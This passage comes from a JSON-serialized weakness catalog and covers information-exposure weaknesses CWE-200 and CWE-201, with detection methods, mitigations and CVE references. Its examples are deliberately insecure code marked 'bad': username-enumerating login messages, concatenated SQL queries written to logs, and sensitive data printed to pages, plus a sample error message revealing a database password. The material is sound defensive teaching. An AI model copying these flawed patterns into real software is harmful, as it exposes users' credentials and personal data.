context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:","Information might be sensitive to different parties, each of which may have their own expectations for whether the information should be protected. These parties include:","Information exposures can occur in different ways:","It is common practice to describe any loss of confidentiality as an \\"information exposure,\\" but this can lead to overuse of CWE-200 in CWE mapping. From the CWE perspective, loss of confidentiality is a technical impact that can arise from dozens of different weaknesses, such as insecure file permissions or out-of-bounds read. CWE-200 and its lower-level descendants are intended to cover the mistakes that occur in behaviors that explicitly manage, store, transfer, or cleanse sensitive information."],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["private, personal information, such as personal messages, financial data, health records, geographic location, or contact details","system status and environment, such as the operating system and installed packages","business secrets and intellectual property","network status and configuration","the product\'s own code or internal state","metadata, e.g. logging of connections or message headers","indirect information, such as a discrepancy between two internal operations that can be observed by an outsider"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["the product\'s own users","people or organizations whose information is created or used by the product, even if they are not direct product users","the product\'s administrators, including the admins of the system(s) and/or networks on which the product operates","the developer"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":[{"#text":"the codesensitive information into resources or messages that are intentionally made accessible to unauthorized actors, but should not contain the information - i.e., the information should have been \\"scrubbed\\" or \\"sanitized\\"","xhtml:b":"explicitly inserts"},{"#text":"a different weakness or mistakethe sensitive information into resources, such as a web script error revealing the full system path of the program.","xhtml:b":"indirectly inserts"},{"#text":"the code manages resources that intentionally contain sensitive information, but the resources areto unauthorized actors. In this case, the information exposure is resultant - i.e., a different weakness enabled the access to the information in the first place.","xhtml:b":"unintentionally made accessible"}]}}]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"Developers may insert sensitive information that they do not believe, or they might forget to remove the sensitive information after it has been processed"},{"Ordinality":"Resultant","Description":"Separate mistakes or weaknesses could inadvertently make the sensitive information available to an attacker, such as in a detailed error message that can be read by an unauthorized party"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Information Disclosure","Description":"This term is frequently used in vulnerability advisories to describe a consequence or technical impact, for any vulnerability that has a loss of confidentiality. Often, CWE-200 can be misused to represent the loss of confidentiality, even when the mistake - i.e., the weakness - is not directly related to the mishandling of the information itself, such as an out-of-bounds read that accesses sensitive memory contents; here, the out-of-bounds read is the primary weakness, not the disclosure of the memory. In addition, this phrase is also used frequently in policies and legal documents, but it does not refer to any disclosure of security-relevant information."},{"Term":"Information Leak","Description":"This is a frequently used term, however the \\"leak\\" term has multiple uses within security. In some cases it deals with the accidental exposure of information from a different weakness, but in other cases (such as \\"memory leak\\"), this deals with improper tracking of resources, which can lead to exhaustion. As a result, CWE is actively avoiding usage of the \\"leak\\" term."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Inter-application Flow Analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source code Weakness Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Attack Modeling","Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-38"},"Intro_Text":"The following code checks validity of the supplied username and password and notifies the user of a successful or failed login.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $username=param(\'username\');my $password=param(\'password\');if (IsValidUsername($username) == 1){}else{}","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"if (IsValidPassword($username, $password) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"print \\"Login Successful\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Login Failed - incorrect password\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"print \\"Login Failed - unknown username\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"\\"Login Failed - incorrect username or password\\""}],"Body_Text":["In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials.","While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as:"]},{"attr":{"@_Demonstrative_Example_ID":"DX-118"},"Intro_Text":"This code tries to open a database connection, and prints any exceptions that occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (Exception $e) {}","xhtml:div":[{"#text":"openDbConnection();","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'Caught exception: \', $e->getMessage(), \'\\\\n\';echo \'Check credentials in config file at: \', $Mysql_config_location, \'\\\\n\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""],"xhtml:i":"//print exception message that includes exception message and configuration file location"}},"Body_Text":"If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database."},{"attr":{"@_Demonstrative_Example_ID":"DX-119"},"Intro_Text":"In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount getUserBankAccount(String username, String accountNumber) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount userAccount = null;String query = null;try {} catch (SQLException ex) {}return userAccount;","xhtml:br":["","",""],"xhtml:div":[{"#text":"if (isAuthorizedUser(username)) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"query = \\"SELECT * FROM accounts WHERE owner = \\"+ username + \\" AND accountID = \\" + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}},{"#text":"String logMessage = \\"Unable to retrieve account information from database,\\\\nquery: \\" + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-120"},"Intro_Text":"This code stores location information about the current user:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();currentUser.setLocation(locationClient.getLastLocation());catch (Exception e) {}","xhtml:br":["","","","",""],"xhtml:i":"...","xhtml:div":{"#text":"AlertDialog.Builder builder = new AlertDialog.Builder(this);builder.setMessage(\\"Sorry, this application has experienced an error.\\");AlertDialog alert = builder.create();alert.show();Log.e(\\"ExampleActivity\\", \\"Caught exception: \\" + e + \\" While on User:\\" + User.toString());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user\'s location is also written to the log."},{"attr":{"@_Demonstrative_Example_ID":"DX-129"},"Intro_Text":"The following is an actual MySQL error statement:","Example_Code":{"attr":{"@_Nature":"result","@_Language":"SQL"},"xhtml:div":"Warning: mysql_pconnect(): Access denied for user: \'root@localhost\' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4"},"Body_Text":"The error clearly exposes the database credentials."},{"attr":{"@_Demonstrative_Example_ID":"DX-130"},"Intro_Text":"This code displays some information on a web page.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":"Social Security Number: <%= ssn %></br>Credit Card Number: <%= ccn %>"},"Body_Text":"The code displays a user\'s credit card and social security numbers, even though they aren\'t absolutely necessary."},{"attr":{"@_Demonstrative_Example_ID":"DX-131"},"Intro_Text":"The following program changes its behavior based on a debug flag.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"<% if (Boolean.getBoolean(\\"debugEnabled\\")) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"%>User account number: <%= acctNo %><%} %>","xhtml:br":["","","",""]}}}},"Body_Text":"The code writes sensitive debug information to the client browser if the \\"debugEnabled\\" flag is set to true ."},{"attr":{"@_Demonstrative_Example_ID":"DX-111"},"Intro_Text":"This code uses location to determine the user\'s current US State location.","Body_Text":["First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application\'s manifest.xml:","During execution, a call to getLastLocation() will return a location based on the application\'s location permissions. In this case the application has permission for the most accurate location possible:","While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":"<uses-permission android:name=\\"android.permission.ACCESS_FINE_LOCATION\\"/>"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation);","xhtml:br":["","","",""]}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1483","Description":"Enumeration of valid usernames based on inconsistent responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483"},{"Reference":"CVE-2001-1528","Description":"Account number enumeration via inconsistent responses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528"},{"Reference":"CVE-2004-2150","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150"},{"Reference":"CVE-2005-1205","Description":"Telnet protocol allows servers to obtain sensitive environment information from clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1205"},{"Reference":"CVE-2002-1725","Description":"Script calls phpinfo(), revealing system configuration to web user","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1725"},{"Reference":"CVE-2002-0515","Description":"Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515"},{"Reference":"CVE-2004-0778","Description":"Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778"},{"Reference":"CVE-2000-1117","Description":"Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"},{"Reference":"CVE-2008-2049","Description":"POP3 server reveals a password in an error message after multiple APOP commands are sent. Might be resultant from another weakness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2049"},{"Reference":"CVE-2007-5172","Description":"Program reveals password in error message if attacker can trigger certain database errors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5172"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2007-1409","Description":"Direct request to library file in web application triggers pathname leak in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409"},{"Reference":"CVE-2005-0603","Description":"Malformed regexp syntax leads to information exposure in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603"},{"Reference":"CVE-2004-2268","Description":"Password exposed in debug information.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2268"},{"Reference":"CVE-2003-1078","Description":"FTP client with debug option enabled shows password to the screen.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1078"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Information Leak (information disclosure)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":13,"Entry_Name":"Information Leakage"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"116"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"169"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"224"}},{"attr":{"@_CAPEC_ID":"285"}},{"attr":{"@_CAPEC_ID":"287"}},{"attr":{"@_CAPEC_ID":"290"}},{"attr":{"@_CAPEC_ID":"291"}},{"attr":{"@_CAPEC_ID":"292"}},{"attr":{"@_CAPEC_ID":"293"}},{"attr":{"@_CAPEC_ID":"294"}},{"attr":{"@_CAPEC_ID":"295"}},{"attr":{"@_CAPEC_ID":"296"}},{"attr":{"@_CAPEC_ID":"297"}},{"attr":{"@_CAPEC_ID":"298"}},{"attr":{"@_CAPEC_ID":"299"}},{"attr":{"@_CAPEC_ID":"300"}},{"attr":{"@_CAPEC_ID":"301"}},{"attr":{"@_CAPEC_ID":"302"}},{"attr":{"@_CAPEC_ID":"303"}},{"attr":{"@_CAPEC_ID":"304"}},{"attr":{"@_CAPEC_ID":"305"}},{"attr":{"@_CAPEC_ID":"306"}},{"attr":{"@_CAPEC_ID":"307"}},{"attr":{"@_CAPEC_ID":"308"}},{"attr":{"@_CAPEC_ID":"309"}},{"attr":{"@_CAPEC_ID":"310"}},{"attr":{"@_CAPEC_ID":"312"}},{"attr":{"@_CAPEC_ID":"313"}},{"attr":{"@_CAPEC_ID":"317"}},{"attr":{"@_CAPEC_ID":"318"}},{"attr":{"@_CAPEC_ID":"319"}},{"attr":{"@_CAPEC_ID":"320"}},{"attr":{"@_CAPEC_ID":"321"}},{"attr":{"@_CAPEC_ID":"322"}},{"attr":{"@_CAPEC_ID":"323"}},{"attr":{"@_CAPEC_ID":"324"}},{"attr":{"@_CAPEC_ID":"325"}},{"attr":{"@_CAPEC_ID":"326"}},{"attr":{"@_CAPEC_ID":"327"}},{"attr":{"@_CAPEC_ID":"328"}},{"attr":{"@_CAPEC_ID":"329"}},{"attr":{"@_CAPEC_ID":"330"}},{"attr":{"@_CAPEC_ID":"472"}},{"attr":{"@_CAPEC_ID":"497"}},{"attr":{"@_CAPEC_ID":"508"}},{"attr":{"@_CAPEC_ID":"573"}},{"attr":{"@_CAPEC_ID":"574"}},{"attr":{"@_CAPEC_ID":"575"}},{"attr":{"@_CAPEC_ID":"576"}},{"attr":{"@_CAPEC_ID":"577"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"616"}},{"attr":{"@_CAPEC_ID":"643"}},{"attr":{"@_CAPEC_ID":"646"}},{"attr":{"@_CAPEC_ID":"651"}},{"attr":{"@_CAPEC_ID":"79"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-172"}}},"Notes":{"Note":{"#text":"As a result of mapping analysis in the 2020 Top 25, this weakness is under review, since it is frequently misused in mapping to cover many problems that lead to loss of confidentiality. See Extended Decription and Alternate Terms.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Alternate_Terms, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Related_Attack_Patterns, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Description, Maintenance_Notes, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak (Information Disclosure)","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"201":{"attr":{"@_ID":"201","@_Name":"Insertion of Sensitive Information Into Sent Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor.","Extended_Description":"Sensitive information could include data that is sensitive in and of itself (such as credentials or private messages), or otherwise useful in the further exploitation of the system (such as internal file system structure).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"209","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"202","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Memory","Read Application Data"],"Note":"Sensitive data may be exposed to attackers."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Specify which data in the software should be regarded as sensitive. Consider which types of users should have access to which types of data."},{"Phase":"Implementation","Description":"Ensure that any possibly sensitive data specified in the requirements is verified with designers to ensure that it is either a calculated risk or mitigated elsewhere. Any information that is not necessary to the functionality should be removed in order to lower both the overhead and the possibility of security sensitive data being sent."},{"Phase":"System Configuration","Description":"Setup default error messages so that unexpected errors do not disclose sensitive information."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-129"},"Intro_Text":"The following is an actual MySQL error statement:","Example_Code":{"attr":{"@_Nature":"result","@_Language":"SQL"},"xhtml:div":"Warning: mysql_pconnect(): Access denied for user: \'root@localhost\' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4"},"Body_Text":"The error clearly exposes the database credentials."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Accidental leaking of sensitive information through sent data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"12"}},{"attr":{"@_CAPEC_ID":"217"}},{"attr":{"@_CAPEC_ID":"612"}},{"attr":{"@_CAPEC_ID":"613"}},{"attr":{"@_CAPEC_ID":"618"}},{"attr":{"@_CAPEC_ID":"619"}},{"attr":{"@_CAPEC_ID":"621"}},{"attr":{"@_CAPEC_ID":"622"}},{"attr":{"@_CAPEC_ID":"623"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Common_Consequences, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Name, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Sent Data","attr":{"@_Date":"2010-09-27"}},{"#text":"Information Exposure Through Sent Data","attr":{"@_Date":"2020-02-24"}},{"#text":"Exposure of Sensitive Information Through Sent Data","attr":{"@_Date":"2020-08-20"}}]}},"202":{"attr":{"@_ID":"202","@_Name":"Exposure of Sensitive Information Through Data Queries","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"When trying to keep information confidential, an attacker can often infer some of the information by using statistics.","Extended_Description":"In situations where data should not be tied to individual users, but a large 